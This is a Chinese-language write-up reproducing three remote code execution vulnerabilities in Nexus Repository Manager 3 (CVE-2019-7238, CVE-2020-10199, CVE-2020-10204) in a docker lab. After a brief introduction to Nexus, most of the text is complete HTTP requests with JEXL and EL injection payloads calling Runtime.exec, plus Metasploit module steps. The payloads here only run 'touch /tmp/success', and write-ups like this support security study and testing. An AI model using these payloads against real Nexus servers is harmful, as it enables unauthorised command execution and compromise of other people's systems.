Nexus
在局域网内架设一个私有的仓库服务器,用其代理所有外部的远程仓库。当本地Maven项目需要下载构件时,先去私服请求,如果私服没有,则再去远程仓库请求,从远程仓库下载构件后,把构件缓存在私服上。这样,及时暂时没有Internet链接,由于私服已经缓存了大量构件,整个项目还是可以正常使用的。同时,也降低了中央仓库的负荷。
Nexus介绍
思路
CVE-2019-7238:Nexus Repository Manager 3 远程代码执行漏洞分析
漏洞复现
docker部署环境,访问:8081。admin:admin123登陆
因为触发漏洞至少需要一个包,所以手动创建。
抓包后构造
POST /service/extdirect HTTP/1.1
Host: 192.168.__.__:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Wed, 27 Oct 2021 12:50:41 GMT
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 368
{
"action":"coreui_Component","method":"previewAssets","data":[{
"page":1,"start":0,"limit":50,"sort":[{
"property":"name","direction":"ASC"}],"filter":
[{
"property":"repositoryName","value":"*"},{
"property":"expression","value":"233.class.forName('java.lang.Runtime').getRuntime().exec('touch /tmp/success')"},{
"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}
还得把这个删掉
exec中便是我们执行的命令。也有大佬直接搞出工具
CVE-2019-7238 Nexus Repository Manager RCE
CVE-2020-10199 远程命令执行漏洞
思路
参考Nexus Repository Manager(CVE-2020-10199/10204)漏洞分析及回显利用方法的简单讨论
漏洞复现
其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞。
docker部署完成后,admin/admin普通用户即可
利用msf直接打
search CVE-2020-10199
use 0
show options
set Rhost,Lhost ,password和port
run
也可利用抓包
POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 203
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.7886248393834028
Content-Type: application/json
Accept: */*
Origin: http://127.0.0.1:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://127.0.0.1:8081/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.7886248393834028; NXSESSIONID=cedf848f-d881-4b58-ac24-9e9c3ece40bc
Connection: close
{
"name": "internal",
"online": true,
"storage": {
"blobStoreName": "default",
"strictContentTypeValidation": true
},
"group": {
"memberNames": ["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}"]
}
}
[]里面便是要执行的命令
["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}"]
再者贴大佬的POC
CVE-2020-10204远程代码执行漏洞
思路
参考CVE-2020-10204/CVE-2020-10199: Nexus Repository Manager3 分析
漏洞复现
docker部署环境,admin/admin登陆管理账号,抓包
coreui_Role接口
POST /service/extdirect HTTP/1.1
Host: 192.168.__.__:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
NX-ANTI-CSRF-TOKEN: 0.09964664409272361
Cookie: NX-ANTI-CSRF-TOKEN=0.09964664409272361; NXSESSIONID=af669d6c-9231-4be8-b83c-b89471ef65c9
Connection: close
Content-Type: application/json
Content-Length: 289
{
"action":"coreui_Role","method":"create","data":[{
"version":"","source":"default","id":"1111","name":"22212","description":"3333","privileges":["$\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}"],"roles":[]}],"type":"rpc","tid":89}
利用另一个接口coreui_User:
{
"action":"coreui_User","method":"update","data":[{
"userId":"www","version":"2","firstName":"www","lastName":"www","email":"[email protected]","status":"active","roles":["$\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10204')}"]}],"type":"rpc","tid":9}